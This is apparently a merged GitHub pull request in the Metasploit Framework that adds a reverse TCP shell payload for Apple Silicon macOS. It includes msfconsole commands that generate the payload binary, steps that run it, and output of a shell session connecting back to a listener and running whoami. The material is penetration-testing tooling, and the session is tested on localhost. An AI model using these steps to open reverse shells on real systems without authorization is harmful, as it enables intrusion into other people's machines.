
Add osx aarch64 shell reverse tcp payload #18652

Conversation

AlanFoster
Contributor

@AlanFoster AlanFoster commented Jan 2, 2024

Continuation of #18646

Adds a new osx/aarch64/shell_reverse_tcp payload that can connect back to the attacker and spawn a command shell using the user-provided command via an execve system call on M1/M2/M3 Apple laptops.

Verification

  1. On an M1 machine
  2. Generate a payload:

```
msf6 payload(osx/aarch64/shell_reverse_tcp) > generate -f macho cmd=/bin/bash -o shell lhost=127.0.0.1
[*] Writing 50072 bytes to shell_again...
```

  3. Create a listener with `to_handler`
  4. chmod and execute:

```
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ chmod +x ./shell
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ ./shell
```

  5. Receive shell:

```
msf6 payload(osx/aarch64/shell_reverse_tcp) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55299) at 2024-01-02 14:16:00 +0000

msf6 payload(osx/aarch64/shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type        Information  Connection
  --  ----  ----        -----------  ----------
  1         shell unix               127.0.0.1:4444 -> 127.0.0.1:55299 (127.0.0.1)

msf6 payload(osx/aarch64/shell_reverse_tcp) > sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (127.0.0.1)
user
```

@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch 2 times, most recently from f3f9367 to b8b2e79 Compare January 2, 2024 14:40

```ruby
result = <<~EOF
// socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
// socket:
```

@AlanFoster AlanFoster Jan 2, 2024


The assembler library doesn't support labels; will comment out for now and circle back if/when it's implemented upstream.

@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch from b8b2e79 to e9fa7c7 Compare January 31, 2024 23:59
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch from e9fa7c7 to 35d5e53 Compare May 23, 2024 10:10
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch from 35d5e53 to 7955381 Compare May 31, 2024 17:05
@adfoster-r7 adfoster-r7 marked this pull request as ready for review May 31, 2024 17:06
@cgranleese-r7 cgranleese-r7 merged commit 4edb1e1 into rapid7:master May 31, 2024
38 of 39 checks passed
@cgranleese-r7

Release Notes

Add osx aarch64 shell reverse tcp payload.

@cgranleese-r7 cgranleese-r7 self-assigned this May 31, 2024
@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label May 31, 2024